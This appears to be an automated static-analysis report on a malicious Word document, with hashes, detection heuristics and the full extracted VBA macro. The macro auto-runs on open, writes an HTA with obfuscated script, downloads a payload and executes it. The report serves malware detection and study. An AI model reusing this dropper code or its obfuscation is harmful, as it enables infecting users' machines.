Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1c68d22c6bc13f93…

MALICIOUS

Office (OOXML)

Size: 79.3 KB
Created: 2021-03-26 06:35:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-10
MD5: 4e91f49255a95147af37e9f94e1227aa
SHA-1: b4371d072e4987277e5ce0c3beb728a825c29d49
SHA-256: 1c68d22c6bc13f93b932ca0aed9e7e2a25415fcead97f737f46dd271b4ecdb20
Risk Score: 170

Heuristics (6)

  • VBA project inside OOXML [medium] OOXML_VBA (4 related findings)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
    Set swapTableValue = CreateObject("wscript.shell")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set swapTableValue = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Sub autoopen()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape - In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8476 bytes
SHA-256: 2d801515ad3dde5ed9a1ef0dddab5db3acce2822e36e7f143b0e770d53a481f7
Script preview
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{8FDAA71E-455C-4A67-9E6B-7123817453B5}{1DE5C790-E9E6-4B6B-B9D0-B62F628C03F0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function variableReferenceMain()
variableReferenceMain = frm.cbtn1.Tag
End Function
Function buttonException()
buttonException = frm.cbtn1.Caption
End Function
Public Sub cbtn1_Click()
Set swapTableValue = CreateObject("wscript.shell")
swapTableValue.exec Replace(variableReferenceMain, "1", "") & " " & Replace(buttonException, "1", "")
End Sub


Attribute VB_Name = "borderCount"
Sub autoopen()
queryGlobalBuffer
End Sub
Function tr(documentCounterClass)
tr = documentCounterClass
End Function
Sub queryGlobalBuffer()
Dim loadCopy As String
loadCopy = Replace(frm.cbtn1.Caption, "1", "")
Set procWindowPaste = New listTempStorage
procWindowPaste.repoDocumentTemp loadCopy, convertTitle
frm.cbtn1_Click
End Sub

Attribute VB_Name = "loadBorder"
Function variableRepoA()
variableRepoA = tr("<div id='content'>fTtlc29sYy5yZWRyb0JuZWVyY1N0c2lsOykyICwiZ3BqLn")
End Function
Function captionPointer()
captionPointer = tr("hlZG5JZXJ1ZGVjb3JwXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm90ZXZhcy5yZW")
End Function
Function exceptionView()
exceptionView = tr("Ryb0JuZWVyY1N0c2lsOyl5ZG9iZXNub3BzZXIucmVkcm9CeXBvYyhldGlydy5yZW")
End Function
Function selectClass()
selectClass = tr("Ryb0JuZWVyY1N0c2lsOzEgPSBlcHl0LnJlZHJvQm5lZXJjU3RzaWw7bmVwby5yZW")
End Function
Function viewView()
viewView = tr("Ryb0JuZWVyY1N0c2lsOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbi")
End Function
Function refExceptionCopy()
refExceptionCopy = tr("A9IHJlZHJvQm5lZXJjU3RzaWwgcmF2eykwMDIgPT0gc3V0YXRzLnJlZHJvQnlwb2")
End Function
Function globalSelect()
globalSelect = tr("MoZmk7KShkbmVzLnJlZHJvQnlwb2M7KWVzbGFmICwiTlExdmlMNm5ZeVFkZGY9cm")
End Function
Function ALocal()
ALocal = tr("VzdSZudm13WWRKVXpmYj1jSXUmaldsYWJqVjRZU2w3UnF0UnRlS2o9NTMxNCYwUX")
End Function
Function sizeRepoDelete()
sizeRepoDelete = tr("pUTlo9S3JFNmdyJlFSRldwZFFabHc5PWhjcmFlcyZnZnVHbHcwNTJyeEF1TVlJbk")
End Function
Function iteratorSwap()
iteratorSwap = tr("9KdFJrPXEmQ2pDR3J0eFE1eWZkbXZnPWhjcmFlcyZDSWszUUU1Wlk9Qm54RjdGej")
End Function
Function tempGeneric()
tempGeneric = tr("83d2FuLzY1MzE2L08vNDAyNjQvbWlmcmV2aUt2UWhmQ2xsSnJ3OXVvL2hueTdwT1")
End Function
Function referenceConst()
referenceConst = tr("k1REJkcGY4aGcybEppaENBRUtSbjBLdTh2MXBuT1MwYTU1ZDBYV3EvZHl1R2JaSG")
End Function
Function loadPtr()
loadPtr = tr("xFRjZmUlhJeERONFRkemRzcWNGU3Y1c2tnODdyWUtIcHAvUVJPYlc3ekVscnc5Y0")
End Function
Function bufWindowRepo()
bufWindowRepo = tr("N6Y2FXN1IvNURBRFN6UTNvL2RkdmRmL21vYy42MTAyLWRsb2hlc3VvaC1yZWJtdW")
End Function
Function namespaceRequest()
namespaceRequest = tr("wvLzpwdHRoIiAsIlRFRyIobmVwby5yZWRyb0J5cG9jOykicHR0aGxteC4ybG14c2")
End Function
Function buttonSwapBorder()
buttonSwapBorder = tr("0iKHRjZWpiT1hldml0Y0Egd2VuID0gcmVkcm9CeXBvYyByYXY=|fXspZXRlbGVEc")
End Function
Function removeResponse()
removeResponse = tr("mV0bnVvYyhoY3RhY307KSJhdGgubmlhbVxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsa")
End Function
Function convertFunc()
convertFunc = tr("WZldGVsZWQuY29yUGRhb0x4RXt5cnQ7KSJ0Y2VqYm9tZXRzeXNlbGlmLmduaXRwa")
End Function
Function copyCount()
copyCount = tr("XJjcyIodGNlamJPWGV2aXRjQSB3ZW4gPSBjb3JQZGFvTHhFIHJhdjspImdwai54Z")
End Function
Function namespaceDeleteStruct()
namespaceDeleteStruct = tr("WRuSWVydWRlY29ycFxcY2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51ci4pI")
End Function
Function ATitleVar()
ATitleVar = tr("mxsZWhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2Vu</div><script languag")
End Function
Function screenAClear()
screenAClear = tr("e='javascript'>function WPointerMem(removeArgument){return(new A")
End Function
Function windowRemove()
windowRemove = tr("ctiveXObject(removeArgument));}function table(){return(documentA")
End Function
Function refTmp()
refTmp = tr("rrayLen('/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJ")
End Function
Function listLocal()
listLocal = tr("IHGFEDCBA'));}function responseDelete(s){var e={}; var i; var b=")
End Function
Function collectionLink()
collectionLink = tr("0; var c; var x; var l=0; var a; var clearClass=''; var w=String")
End Function
Function textResponse()
textResponse = tr(".fromCharCode; var L=s.length;var rightDelete = 'charAt';for(i=0")
End Function
Function mainCountRepo()
mainCountRepo = tr(";i<64;i++){e[table()[rightDelete](i)]=i;}for(x=0;x<L;x++){c=e[s[")
End Function
Function tableVb()
tableVb = tr("rightDelete](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0x")
End Function
Function queryVbDocument()
queryVbDocument = tr("ff)||(x<(L-2)))&&(clearClass+=w(a));}}return(clearClass);};funct")
End Function
Function memButtonProcedure()
memButtonProcedure = tr("ion documentArrayLen(pasteA){return pasteA.split('').reverse().j")
End Function
Function deleteNextReference()
deleteNextReference = tr("oin('');}responseWCollection = window;convertBufDatabase = docum")
End Function
Function ExBufferLib()
ExBufferLib = tr("ent;responseWCollection.resizeTo(1, 1);responseWCollection.moveT")
End Function
Function textRemoveValue()
textRemoveValue = tr("o(-100, -100);var valueDocumentVariable = convertBufDatabase.get")
End Function
Function pasteCaption()
pasteCaption = tr("ElementById('content').innerHTML;var valueDocumentVariable = val")
End Function
Function buttonMemory()
buttonMemory = tr("ueDocumentVariable.split('|');var countArgumentIndex = documentA")
End Function
Function globalLen()
globalLen = tr("rrayLen(responseDelete(valueDocumentVariable[0]));var libConvert")
End Function
Function vbFuncClass()
vbFuncClass = tr(" = documentArrayLen(responseDelete(valueDocumentVariable[1]));</")
End Function
Function AProcedure()
AProcedure = tr("script><script language='javascript'>function captionVarPointer(")
End Function
Function ptrLenVb()
ptrLenVb = tr("optionScreen){var referenceSwapA = WPointerMem('msscriptcontrol.")
End Function
Function databaseLoadCounter()
databaseLoadCounter = tr("scriptcontrol');referenceSwapA.Language = 'jscript';referenceSwa")
End Function
Function tableCollection()
tableCollection = tr("pA.Timeout = 60000;referenceSwapA.AddCode(optionScreen);return(n")
End Function
Function textboxTempMem()
textboxTempMem = tr("ull);}</script><script language='vbscript'>captionVarPointer cou")
End Function
Function removeLenRequest()
removeLenRequest = tr("ntArgumentIndex : captionVarPointer libConvert : responseWCollec")
End Function
Function vbPtr()
vbPtr = tr("tion.close</script></body></html>")
End Function
Function convertTitle()
convertTitle = variableRepoA + captionPointer + exceptionView + selectClass + viewView + refExceptionCopy + globalSelect + ALocal + sizeRepoDelete + iteratorSwap + tempGeneric + referenceConst + loadPtr + bufWindowRepo + namespaceRequest + buttonSwapBorder + removeResponse + convertFunc + copyCount + namespaceDeleteStruct + ATitleVar + screenAClear + windowRemove + refTmp + listLocal + collectionLink + textResponse + mainCountRepo + tableVb + queryVbDocument + memButtonProcedure + deleteNextReference + ExBufferLib + textRemoveValue + pasteCaption + buttonMemory + globalLen + vbFuncClass + AProcedure + ptrLenVb + databaseLoadCounter + tableCollection + textboxTempMem + removeLenRequest + vbPtr
End Function

Attribute VB_Name = "listTempStorage"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub repoDocumentTemp(tableTemp As String, loadTrustMem As String)
Dim tmpLeftNext As FileSystemObject
Set tmpLeftNext = New FileSystemObject
Dim vbRemove As TextStream
Set vbRemove = tmpLeftNext.CreateTextFile(tableTemp)
vbRemove.WriteLine loadTrustMem
vbRemove.Close
Set vbRemove = Nothing
Set tmpLeftNext = Nothing
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 37376 bytes
SHA-256: cf007fd3f35e7ae2287e4b122536f721fe1ece121b76cd0d4d1b8b6241c26593